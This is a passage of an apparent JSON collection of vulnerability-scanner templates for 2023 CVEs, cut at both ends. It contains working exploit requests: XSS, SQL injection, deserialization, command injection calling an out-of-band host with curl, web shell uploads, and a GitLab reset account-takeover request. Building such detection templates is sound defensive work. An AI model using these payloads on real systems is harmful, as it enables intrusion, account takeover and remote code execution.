application/x-www-form-urlencoded\n\naction=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}\n","GET /clog.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_4","regex":["<table[^;]*;['\"]>\\s*(<tr class=['\"]clogError['\"]>[\\s\\S]*unserialize[\\s\\S]*managers.php[\\s\\S]*[Aa]uthenticated)"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","part":"body","group":1,"regex":["var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]"],"internal":true}]}]},{"id":"CVE-2023-23161","info":{"name":"Art Gallery Management System Project v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["center\"><img src=1 onerror=alert(document.domain)>","Art Type"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6114","info":{"name":"Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/tmp/","{{BaseURL}}/wp-content/backups-dup-pro/tmp/"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, '/tmp') && contains(body, '<title>Index of')"],"condition":"and"}]}]},{"id":"CVE-2023-43326","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/change_emailahrixia%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3eahrixia?step1=1"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-22480","info":{"name":"KubeOperator Foreground `kubeconfig` - File Download","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/clusters/kubeconfig/k8s"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiVersion:","clusters:"],"condition":"and"},{"type":"word","part":"header","words":["application/download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3578","info":{"name":"DedeCMS 5.7.109 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"response","words":["DedeCms"],"case-insensitive":true}]},{"raw":["GET /co_do.php?rssurl=https://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]}]}]},{"id":"CVE-2023-1408","info":{"name":"Video List Manager <= 1.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains_all(body_2, \"Edit Video\",\"Youtube</option>\")"],"condition":"and"}]}]},{"id":"CVE-2023-20888","info":{"name":"VMware Aria Operations for Networks - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/events/push-notifications HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: application/json\n\n{\"endOffset\": \"{{ generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\") }} \"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-1730","info":{"name":"SupportCandy < 3.1.5 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: wpsc_guest_login_auth={\"email\":\"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"supportcandy\")"],"condition":"and"}]}]},{"id":"CVE-2023-39650","info":{"name":"PrestaShop Theme Volty CMS Blog - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_any(tolower(response), \"prestashop\", \"tvcmsblog\")"],"internal":true}]},{"raw":["@timeout: 20s\nGET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post\"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(8)))oqFL)--+yxoW HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","@timeout: 20s\nGET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post\"+AND+5484=5484--+xhCs HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","@timeout: 20s\nGET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post\"+AND+5484=5485--+xhCs HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=8","status_code_1 == 200 && contains(body_1, \"tvcmsblog\")"],"condition":"and"},{"type":"dsl","name":"blind-based","dsl":["status_code_2 == 200 && contains(body_2, \"tvcmsblog\")","status_code_2 == 200 && status_code_3 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-2059","info":{"name":"DedeCMS 5.7.87 - Directory Traversal","severity":"medium"},"requests":[{"raw":["GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\\..\\..\\ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["dirname(__FILE__)","$cfg_basedir","dedecms"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-31446","info":{"name":"Cassia Gateway Firmware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","regex":["^OK$"]}]}]},{"id":"CVE-2023-4168","info":{"name":"Adlisting Classified Ads 2.14.0 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"google_map_key\", \"api_key\", \"auth_domain\")"],"condition":"and"}]}]},{"id":"CVE-2023-35158","info":{"name":"XWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain)"],"matchers":[{"type":"dsl","dsl":["contains(body, \"href=\\\"javascript:alert(document.domain)\\\">Cancel</a>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-52251","info":{"name":"Kafka UI 0.7.1 Command Injection","severity":"high"},"requests":[{"raw":["GET /api/clusters HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"cluster-name","internal":true,"json":[".[0].name"]}]},{"raw":["GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"topic-name","internal":true,"json":[".topics[].name"]}]},{"raw":["@timeout 20s\nGET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Assigning partitions"]}]}]},{"id":"CVE-2023-49494","info":{"name":"DedeCMS v5.7.111 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /uploads/include/dialog/select_media_post_wangEditor.php?filename=1%3Cinput%20onfocus=eval(atob(this.id))%20id=YWxlcnQoZG9jdW1lbnQuY29va2llKTs=%20autofocus%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"data\":{\"url\":","<input onfocus=eval(atob(this.id)) id="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1835","info":{"name":"Ninja Forms < 3.6.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Ninja Forms\")"],"condition":"and"}]}]},{"id":"CVE-2023-40751","info":{"name":"PHPJabbers Fundraising Script v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=prompt(document.domain)>","didn't exists"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3380","info":{"name":"WAVLINK WN579X3 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","words":["images/WAVLINK-logo.png","<title>Wi-Fi APP Login</title>"],"condition":"and","internal":true}]},{"raw":["POST /cgi-bin/adm.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/ping.shtml\n\npage=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-7028","info":{"name":"GitLab - Account Takeover via Password Reset","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"token","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true}]},{"raw":["@timeout: 20s\nPOST /users/password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/users/password/new\n\nauthenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}\n"],"payloads":{"username":["admin@example.com","admin@{{RDN}}","root@{{RDN}}","gitlab@{{RDN}}","git@{{RDN}}"]},"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'smtp')"]}],"extractors":[{"type":"dsl","dsl":["username"]}]}]},{"id":"CVE-2023-34659","info":{"name":"JeecgBoot 3.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/show HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"id\":\"961455b47c0b86dc961e90b5893bff05\",\"apiUrl\":\"\",\"params\":\"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XPATH syntax error:","SQLException"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29084","info":{"name":"ManageEngine ADManager Plus - Command Injection","severity":"high"},"requests":[{"raw":["POST /j_security_check HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nis_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator\n","GET /home.do HTTP/1.1\nHost: {{Hostname}}\n","POST /api/json/admin/saveServerSettings HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nparams=[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"1.1.1.1\",\"USER_NAME\":\"random\",\"PASSWORD\":\"asd\\r\\n{{cmd}}\",\"PORT\":\"80\"}]&admpcsrf={{admpcsrf}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"message\":\"","Proxy Settings"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"kval","name":"admpcsrf","internal":true,"kval":["admpcsrf"],"part":"header"}]}]},{"id":"CVE-2023-38964","info":{"name":"Academy LMS 6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/courses?query=\"><svg+onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<svg onload=alert(document.domain)>\", \"All courses</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-37629","info":{"name":"Online Piggery Management System v1.0 - Unauthenticated File Upload","severity":"critical"},"requests":[{"raw":["POST /pig/add-pig.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"pigno\"\n\npig-fms-100\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"weight\"\n\n65465\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"arrived\"\n\n{{date_time(\"%Y-%M-%D\")}}\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"gender\"\n\nfemale\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"status\"\n\nactive\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"breed\"\n\n2\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"remark\"\n\n4fwefwe\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"pigphoto\"; filename=\"{{rand_base(5)}}\".php\"\nContent-Type: application/x-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"submit\"\n\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(content_type, \"text/html\")","contains(body, \"successfully created\")"],"condition":"and"}]}]},{"id":"CVE-2023-5222","info":{"name":"Viessmann Vitogate 300 - Hardcoded Password","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-login\",\"params\":{\"uid\":\"{{username}}\",\"pwd\":\"{{password}}\"}}\n"],"attack":"pitchfork","payloads":{"username":["vitomaster","vitogate"],"password":["viessmann1917","viessmann"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["admin\":true","\"sessionId\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0630","info":{"name":"Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[slimstat f=\"count\" w=\"author\"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"audioShortcodeLibrary\")"],"condition":"and"}]}]},{"id":"CVE-2023-40779","info":{"name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5coast.pro/%2f%2e%2e"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-33439","info":{"name":"Faculty Evaluation System v1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=login HTTP/1.1\nHost:{{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nemail={{username}}&password={{password}}&login=1\n","GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1\nHost:{{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Fatal error:\")","contains(body, \"XPATH syntax error:\")"],"condition":"and"}]}]},{"id":"CVE-2023-34537","info":{"name":"Hoteldruid 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /inizio.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nvers_hinc=1&nome_utente_phpr={{username}}&password_phpr={{password}}\n","POST /creaprezzi.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1\n"],"skip-variables-check":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"HotelDruid\")"],"condition":"and"}]}]},{"id":"CVE-2023-27350","info":{"name":"PaperCut - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /app?service=page/SetupCompleted HTTP/1.1\nHost: {{Hostname}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update\n","GET /app?service=page/PrinterList HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=page%2FPrinterList\n","POST /app?service=direct/1/PrinterList/selectPrinter&sp={{printerID}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterList%2FselectPrinter&sp={{printerID}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId={{printerID}}&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27{{cmd}}%27%29%3B&%24Submit%241=Apply\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Avanceret kontering"]}],"extractors":[{"type":"regex","name":"printerID","group":1,"regex":["erList\\/selectPrinterCost&amp;sp=([a-z0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2479","info":{"name":"Appium Desktop Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=<img/src=\"http://{{interactsh-url}}\">"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-40753","info":{"name":"PHPJabbers Ticket Support Script v3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?controller=pjBase&action=pjActionLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin_user=1&login_email={{username}}&login_password={{password}}&login_captcha=\n","GET /notification_create=1&type=NewTicket&department_id%5B%5D=2&user_id%5B%5D=1&i18n%5B1%5D%5Bsubject%5D=a&i18n%5B1%5D%5Bmessage%5D=%3C%2Ftextarea%3E%3CscrIpt%3Ealert(document.domain)%3B%3C%2FscRipt%3E%3Ctextarea%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["</textarea><scrIpt>alert(document.domain);</scRipt><textarea>","Subject","Recipient users"],"condition":"and"},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1315","info":{"name":"osTicket < v1.16.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /scp/login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"osticket\")"],"internal":true}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1\n","GET /{{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["scp/ajax.php/tickets/search?parent_id=1\"><svg/x=\">\"/onload=confirm()//","scp/ajax.php/tickets/search/create?pid=adhoc%2cpdXBTnfSg0riebm%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etgghb"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_any(body, \"><svg/x=\\\">\\\"/onload=confirm()//\", \"\\\"><script>alert(document.domain)</script>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3849","info":{"name":"mooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find-a-matchpksyk\"><img%20src%3da%20onerror%3dalert(document.cookie)>s9a64?"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains(body, \"><img src=a onerror=alert(document.cookie)>s9a64\") && contains(body, \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-41763","info":{"name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Skype"]}]}]},{"id":"CVE-2023-32563","info":{"name":"Ivanti Avalanche - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /Servlet/Skins HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 333\nContent-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f\nConnection: close\n\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"guid\"\n\n../../../Web/webapps/ROOT\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\n\n<%\nout.println(\"CVE-2023-32563\");\n%>\n--------------------------eacf31f23ac1829f--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2023-32563"]}]}]},{"id":"CVE-2023-1362","info":{"name":"unilogies/bumsys < v2.0.2 - Clickjacking","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","!regex('X-Frame-Options', header)","contains(body, 'BUM</b>Sys</a>')"],"condition":"and"}]}]},{"id":"CVE-2023-23333","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nGET 